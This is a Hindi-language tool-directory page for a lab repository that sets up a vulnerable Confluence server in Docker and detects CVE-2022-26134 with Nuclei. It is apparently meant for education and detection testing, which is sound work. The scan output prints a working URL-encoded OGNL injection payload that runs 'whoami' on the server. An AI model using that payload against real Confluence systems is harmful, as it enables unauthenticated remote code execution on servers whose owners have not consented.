Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/skhalsa-sigsci/cve-2022-26134-lab
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubskhalsa-sigsci/cve-2022-26134-lab

CVE-2022-26134-LAB

Nuclei का उपयोग करके CVE-2022-26134 का पता लगाना

रिपॉजिटरी देखें
313 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-26134-LAB

Confluence Server और Confluence Data Center में एक महत्वपूर्ण अनप्रमाणित रिमोट कोड निष्पादन भेद्यता शामिल है, जिसे CVE-2022-26134 के रूप में पहचाना गया है, जो अटलासियन द्वारा 2 जून, 2022 को जारी एक सुरक्षा सलाहकार के अनुसार है। जब इसे 2 जून को प्रकाशित किया गया था, तब यह भेद्यता अनपैच थी और वास्तविक दुनिया में इसका शोषण किया जा रहा था। 3 जून तक, पैच और एक अस्थायी समाधान दोनों उपलब्ध हैं।

यह भंडार केवल प्रयोगात्मक और शैक्षिक उद्देश्यों के लिए है।

आवश्यकताएँ

  • Docker
  • Nuclei

भेद्य Confluence वातावरण

भेद्य वातावरण चलाना

root@kitploit:~
docker-compose up

एक बार शुरू होने के बाद आप निम्नलिखित URL पते का उपयोग करके Confluence सर्वर तक पहुँच सकते हैं

http://127.0.0.1:8090/

Confluence सर्वर सेटअप

  1. पहली बार साइट पर जाने पर आपको सेटअप के माध्यम से ले जाया जाएगा।
  2. कोई बक्सा चेक न करें और "Get apps" पृष्ठ पर "Next" चुनें।
  3. लाइसेंस कुंजी पृष्ठ पर "Get an evaluation license" लिखे लिंक पर क्लिक करें।
  4. आपको my.atlassian.com पर पुनर्निर्देशित किया जाएगा। सुनिश्चित करें कि चयनित लाइसेंस प्रकार Confluence (Data Center) है। अपनी पसंद का कोई भी संगठन नाम टाइप करें। सुनिश्चित करें कि "Your instance is" के लिए रेडियो बटन "up and running" चुना गया है। एक बार जब आप इन विवरणों को सत्यापित कर लें, तो "Generate License" बटन पर क्लिक करें।
  • एक पुष्टिकरण मॉडल पॉप अप होगा जो पूछेगा कि क्या आप इसे सर्वर: 127.0.0.1 पर स्थापित करना चाहते हैं। "Yes" चुनें।
  • हाँ चुनने से आपके स्थानीय Confluence उदाहरण पर लाइसेंस कुंजी स्वचालित रूप से भर जाएगी। "Next" चुनें।
  • "Standalone" परिनियोजन प्रकार चुनें और "Next" चुनें।
  • निम्नलिखित के अनुसार डेटाबेस सेटअप करने वाले पृष्ठ पर विवरण भरा जाना चाहिए:
    • Database type: PostgreSQL
    • Setup type: Simple
    • Hostname: db
    • Port: 5432
    • Database name: confluence
    • Username: confluence
    • Password: 123456789
  • इन फ़ील्ड को भरने के बाद "Test connection" बटन दबाएँ। आपको संदेश मिलना चाहिए "Success! Database connected successfully"। फिर "Next" पर क्लिक करें।
  • यह आपके डेटाबेस को सेट करना शुरू कर देगा। इसमें थोड़ा समय लग सकता है। धैर्य रखें।
  • एक बार डेटाबेस सेटअप पूरा हो जाने पर आप "Load Content" पृष्ठ पर होंगे। "Example Site" बटन चुनें।
  • अगला "Configure User Management" पृष्ठ पर "Manage users and groups with Confluence" चुनें।
  • अगला "Configure System Administrator Account" पृष्ठ पर एक खाता बनाएँ और "Next" चुनें।
  • एक बार पूरा हो जाने पर आप देखेंगे कि सेटअप सफल रहा। "Start" दबाएँ।
  • यह आपसे "Create a space to store your work" पूछेगा। अपनी पसंद का कोई भी स्पेस नाम दर्ज करें।
  • ट्यूटोरियल छोड़ें
  • अब आपने Confluence सर्वर का मूल्यांकन सेटअप पूरा कर लिया है।
  • CVE-2022-26134 का पता लगाना

    यह भेद्यता एक OGNL इंजेक्शन भेद्यता है जो HTTP सर्वर को प्रभावित करती है। OGNL पेलोड HTTP अनुरोध के URI में रखा जाता है। किसी भी प्रकार की HTTP विधि काम करती प्रतीत होती है, चाहे वह मान्य (GET, POST, PUT, आदि) हो या अमान्य (जैसे “BALH”)।

    https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis

    Nuclei का उपयोग करना

    निम्नलिखित Nuclei कमांड चलाएँ:

    root@kitploit:~
    nuclei -u http://127.0.0.1:8090 -t nuclei-templates/cves/2022/CVE-2022-26134.yaml
    

    स्कैन आउटपुट

    root@kitploit:~
    [CVE-2022-26134] [http] [critical] http://127.0.0.1:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ [confluence]
    
    टूल डाउनलोड करें